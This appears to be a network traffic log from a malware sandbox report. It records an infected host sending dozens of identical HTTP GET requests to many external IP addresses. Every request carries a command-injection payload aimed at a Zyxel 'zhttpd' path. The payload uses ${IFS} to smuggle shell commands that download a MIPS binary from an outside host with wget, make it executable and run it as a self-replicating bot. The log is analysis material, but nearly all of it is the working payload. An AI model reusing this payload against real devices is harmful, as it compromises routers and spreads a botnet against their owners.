                                                      Feb 2, 2024 06:35:51.603777885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4050192.168.2.1442260201.108.113.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603811979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4051192.168.2.1440524131.246.162.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603848934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4052192.168.2.14359882.80.112.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603876114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4053192.168.2.144305425.189.10.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603905916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4054192.168.2.143864045.108.187.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.603990078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4055192.168.2.1447632125.146.34.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604027033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4056192.168.2.1446084120.154.148.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604058027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4057192.168.2.1434874168.8.195.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604079008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4058192.168.2.143745638.206.228.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604118109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4059192.168.2.1438222185.47.244.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604156971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4060192.168.2.145234466.73.213.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604226112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4061192.168.2.143381268.236.105.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604247093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4062192.168.2.1455286152.228.88.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604290962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4063192.168.2.145369086.202.158.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604320049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4064192.168.2.143277468.170.45.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604372025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4065192.168.2.145990471.11.71.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604413033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4066192.168.2.1441570138.17.194.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604450941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4067192.168.2.1454344137.57.123.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604505062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4068192.168.2.1460192189.19.242.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604538918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4069192.168.2.144461013.244.220.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604569912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4070192.168.2.1434670121.135.71.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604610920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4071192.168.2.1451560157.46.207.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604651928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4072192.168.2.144400893.71.210.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604701042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4073192.168.2.1433542201.207.244.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604727030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4074192.168.2.1450364183.243.228.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604759932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4075192.168.2.1436508211.232.21.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604804039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4076192.168.2.1456000148.79.11.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604844093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4077192.168.2.1457192181.84.50.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604881048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4078192.168.2.1433222180.70.221.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604903936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4079192.168.2.144329012.17.20.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604939938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4080192.168.2.1442006186.204.84.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.604995012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4081192.168.2.1438374143.171.20.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605032921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4082192.168.2.145476412.4.254.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605087042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4083192.168.2.1448930137.213.163.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605108976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4084192.168.2.145902247.90.158.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605132103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4085192.168.2.1455756118.182.42.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605166912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4086192.168.2.145031250.112.130.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605216026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4087192.168.2.1434816175.155.190.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605273962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4088192.168.2.1458742144.111.209.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605314016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4089192.168.2.144659282.17.114.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605412960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4090192.168.2.14597085.251.62.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605449915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4091192.168.2.1447124212.136.3.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605485916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4092192.168.2.144180048.254.182.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605526924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4093192.168.2.145838219.107.188.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605571032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4094192.168.2.1440684163.31.9.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605592012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4095192.168.2.144889094.11.155.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605633974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4096192.168.2.145342278.172.206.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605662107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4097192.168.2.144315066.38.16.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605705023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4098192.168.2.143492260.214.69.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605751991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4099192.168.2.1454680103.79.121.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605779886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4100192.168.2.1444144148.27.107.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605814934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4101192.168.2.144181287.40.107.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605854034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4102192.168.2.144835419.112.246.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605891943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4103192.168.2.1432960202.52.39.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.605964899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4104192.168.2.1446610188.211.72.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606015921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4105192.168.2.14364348.35.169.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606057882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4106192.168.2.1460370135.228.169.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606107950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4107192.168.2.1433298125.44.5.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606142044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4108192.168.2.1435320126.241.121.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606173038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4109192.168.2.144827061.148.52.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606205940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4110192.168.2.1443884106.86.103.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606232882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4111192.168.2.1458960173.10.190.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606290102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4112192.168.2.144348480.91.137.206443
                                                      TimestampBytes transferredDirectionData
